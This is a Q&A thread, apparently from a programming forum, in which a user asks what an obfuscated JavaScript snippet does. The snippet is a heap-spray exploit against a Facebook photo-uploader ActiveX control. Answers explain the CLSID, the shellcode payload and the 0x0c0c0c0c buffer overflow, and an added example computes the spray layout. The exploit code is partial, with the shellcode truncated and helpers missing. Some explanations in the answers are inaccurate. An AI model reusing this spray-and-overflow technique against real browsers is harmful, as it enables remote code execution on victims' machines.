
I don't understand this Code

I do not understand this code snippet:

function ms(){ 
    var plc=unescape('".
    unescape( '\x43\x43\x43\x43\n.............\xEF'. $URL).CollectGarbage(); 
    if (mf)return(0);
    mf=1; 
    var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
    var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
    for(i=0;i<hb;i++) m[i]=ss+plc; 
    hav();
    return(1); 
    }  

In the above function I can't seem to figure out the variable types, or figure out what it's doing with the hsta variable, and what it's assigning to it:

    var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
    var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
    for(i=0;i<hb;i++)m[i]=ss+plc;

I also can't figure out this function:

function fb(){
    try {
        var obj=null;
        obj=cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}');
        if(obj){
            ms();
            var buf = addr(0x0c0c0c0c);
            while (buf.length < 400) buf += buf;
            buf = buf.substring(0,400);
            obj.ExtractIptc = buf;
            obj.ExtractExif = buf;
            }
       } catch(e){}
    return 0;
    }

What does the following code mean?

    cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}')

What kind of variable is this?

    var buf = addr(0x0c0c0c0c);
    buf = buf.substring(0,400);
    obj.ExtractIptc = buf;
    obj.ExtractExif = buf;

Most importantly, what is that code snippet trying to do?

Here are some more functions:

function hex(num,width){
    var digits='0123456789ABCDEF';
    var hex=digits.substr(num&0xF,1);
    while(num>0xF){
        num=num>>>4;
        hex=digits.substr(num&0xF,1)+hex;
        } 
    var width=(width?width:0);
    while(hex.length<width)hex='0'+hex;
    return hex; 
}

function addr(addr){
    return unescape('%u'+hex(addr&0xFFFF,4)+'%u'+hex((addr>>16)&0xFFFF,4));
    }

Any guidance would be appreciated.

It's a JavaScript snippet trying to exploit a security vulnerability related to Facebook, more specifically to its image uploader client-side ActiveX control.

The cobj part tries to create an object of ClassID {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} which happens to be an ActiveX photo uploader control. The ExtractIptc and ExtractExif functions belong to that specific ActiveX control.

The core of the code is really memory address manipulation, shifting, using masks to separate high and low bits. For example, hex((addr>>16)&0xFFFF,4) takes an address, shifts it 16 bits to the right, clears up the lower part and converts it to a hex number. To actually understand most of this code, you should have the right debugging tools.

Googling the {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} ClassID gave some interesting results you should look into:

http://www.kb.cert.org/vuls/id/776931

http://seclists.org/fulldisclosure/2008/Feb/0023.html

http://securitytracker.com/alerts/2008/Feb/1019297.html

Please note, this is not PHP. It's JavaScript.

More details...

cobj is probably translated into a CreateObject() call. Every registered ActiveX control has its own Class ID, and they have the form {00000000-0000-0000-0000-000000000000}. When you want to refer to the registered library, and create an instance of it, you can use either its name or its Class ID.

The ActiveX control itself should be an .OCX or .DLL file on your computer. If you can find this file and debug it, you'll get the most specific details about the ExtractIptc and ExtractExif functions. Again, those two functions seem to have vulnerabilities when called in a specific way, and this is what that script is trying to exploit.

The var hsta=0x0c0c0c0c part defines a variable hsta, equal to the hexadecimal number 0c0c0c0c. It's the same as writing var hsta = 202116108. In computer engineering, it's easier to deal with hexadecimal addresses than decimal numbers since addresses and data inside the computer's memory are binary and can be directly represented as a hex number. More details about hexadecimal here: http://en.wikipedia.org/wiki/Hexadecimal .

The variable name hsta seems to be in Hungarian notation (first letter represents the variable type - h for hex). I would therefore assume it means hexadecimal start address (hsta). Following the same train of thought, my guess would be that pl means payload and plc means payload code.

The payload code is the code the computer will execute if the exploit was successful, and it's what you see at the beginning of the script (\x43\x43\x43\x43\n....\xEF). It's encoded as shellcode for a particular CPU architecture and operating system. That means code that's already compiled, standalone, and can be piped to the CPU directly. If you decode this, you'll probably find something close to machine code. It's probably nothing positive.

The hex(num,width) function converts a decimal number to its hexadecimal form. I've tested the function separately, and it returned 3E8 when feeding it 1000. The width variable is simply used to exit the script if the resulting hexadecimal number is bigger than specified.

About this part:

    var buf = addr(0x0c0c0c0c);
    buf = buf.substring(0,400);
    obj.ExtractIptc = buf;
    obj.ExtractExif = buf;

The buf variable is a buffer. A buffer is nothing more than data in memory. It can be interfaced as a string, as shown in this code. My guess is that a buffer of 400 bytes is created from whatever content is in memory at 0x0c0c0c0c, and then fed into two functions.
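The following is an added, stand-alone example and not code from the question or from either answer. It reimplements the posted hex() and addr() helpers under new names so they can be inspected offline, and then shows three things the snippet itself only implies: that addr() yields a two-character string whose bytes are the address in little-endian order (so the "buffer" in fb() is 400 characters of U+0C0C, i.e. 800 bytes of 0x0C, not data read from address 0x0c0c0c0c); that the width argument of hex() is zero-padding; and how the sizes in ms() (hbs, pl, sss, hb) work out for a given payload length. The sample address 0x7ffdf000, the 100-character payload length, and the reading of 0x38 as per-block overhead are constructed inputs and assumptions for illustration; nothing here creates or touches an ActiveX control.

```javascript
// Added example (not from the original post): what the page's hex()/addr()
// helpers build, and how the numbers in fb() and ms() work out.

// Same algorithm as the page's hex(): peel nibbles with an unsigned shift,
// then left-pad with '0' up to `width`. The width only pads; it never aborts.
function toHex(num, width = 0) {
  const digits = '0123456789ABCDEF';
  let out = digits[num & 0xF];
  while (num > 0xF) {
    num = num >>> 4;
    out = digits[num & 0xF] + out;
  }
  while (out.length < width) out = '0' + out;
  return out;
}

// Same layout as the page's addr(): low 16 bits first, then the high 16 bits,
// each as a %uXXXX escape. The page uses `addr>>16`; `>>>` gives the same
// result for any address below 0x80000000 and stays correct above it.
function addrString(addr) {
  return '%u' + toHex(addr & 0xFFFF, 4) + '%u' + toHex((addr >>> 16) & 0xFFFF, 4);
}

// What unescape() does with %uXXXX escapes: one UTF-16 code unit per escape.
function unescapeU(s) {
  return s.replace(/%u([0-9A-Fa-f]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// The bytes a JS string occupies in memory (UTF-16LE, low byte of each unit
// first). addr(0x7ffdf000) therefore lays down 00 F0 FD 7F: a little-endian
// 32-bit pointer, which is the whole point of the low/high word ordering.
function stringBytes(str) {
  const bytes = [];
  for (let i = 0; i < str.length; i++) {
    const unit = str.charCodeAt(i);
    bytes.push(unit & 0xFF, unit >>> 8);
  }
  return bytes;
}

// fb(): start from addr(target) (2 characters), double until at least `chars`
// characters, then cut to exactly `chars`. Every character is the same code
// unit, so for 0x0c0c0c0c the control receives `chars` * 2 bytes of 0x0C.
function overflowBuffer(target, chars) {
  let buf = unescapeU(addrString(target));
  while (buf.length < chars) buf += buf;
  return buf.substring(0, chars);
}

// ms(): each sprayed block is hbs bytes = slide (sss) + payload (pl) + 0x38
// (assumed here to be per-block overhead; the page does not say). The loop
// `for(i=0;i<hb;i++)` with hb = (hsta - hbs) / hbs runs Math.ceil(hb) times.
function sprayLayout(hsta, hbs, payloadChars) {
  const pl = payloadChars * 2;     // JS characters are 2 bytes each
  const sss = hbs - (pl + 0x38);   // bytes left for the slide
  const hb = (hsta - hbs) / hbs;   // loop bound, usually not an integer
  const blocks = Math.ceil(hb);
  return { payloadBytes: pl, slideBytes: sss, blocks: blocks, totalBytes: blocks * hbs };
}

function demo() {
  const ptr = 0x7ffdf000;                           // constructed sample address
  const fbBuf = overflowBuffer(0x0c0c0c0c, 400);
  if (![...fbBuf].every(c => c.charCodeAt(0) === 0x0c0c)) throw new Error('unexpected buffer');
  const layout = sprayLayout(0x0c0c0c0c, 0x100000, 100);   // constructed 100-char payload
  console.log('hex(1000)        =', toHex(1000));           // 3E8 (as the answer observed)
  console.log('hex(1000, 4)     =', toHex(1000, 4));        // 03E8 (width zero-pads)
  console.log('addr(0x7ffdf000) =', addrString(ptr));       // %uF000%u7FFD
  console.log('bytes in memory  =', stringBytes(unescapeU(addrString(ptr))).map(b => toHex(b, 2)).join(' '));
  console.log('fb() buffer      =', fbBuf.length, 'chars /', fbBuf.length * 2, 'bytes of 0x0C');
  console.log('ms() layout      =', layout);
  return layout;
}

demo();
```

With the constructed 100-character payload, each 1 MiB block carries 200 payload bytes and 1048320 slide bytes, and the loop allocates 192 blocks (hb is about 191.75, so i < hb holds 192 times), i.e. 0x0C000000 bytes in total, which is what pushes the heap up to the 0x0c0c0c0c region the 400-character buffer points at.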

There are several function definitions missing in here. Namely, the hav() function.

I fixed the formatting as much as I could, but there still seem to be chunks missing. At least, I'm seeing syntax errors, uninitialized variables, etc.

If this is actual working code please edit your question and (using the "code" button "101/010" or just indenting 4 spaces rather than quoting with the '"' button) post the actual code so that what we see matches what you are seeing. EDIT: DON'T TRY TO RUN THIS CODE. It's probably malicious.

If it isn't working code, there's your answer: it doesn't work, so trying to figure out how it works doesn't make sense.
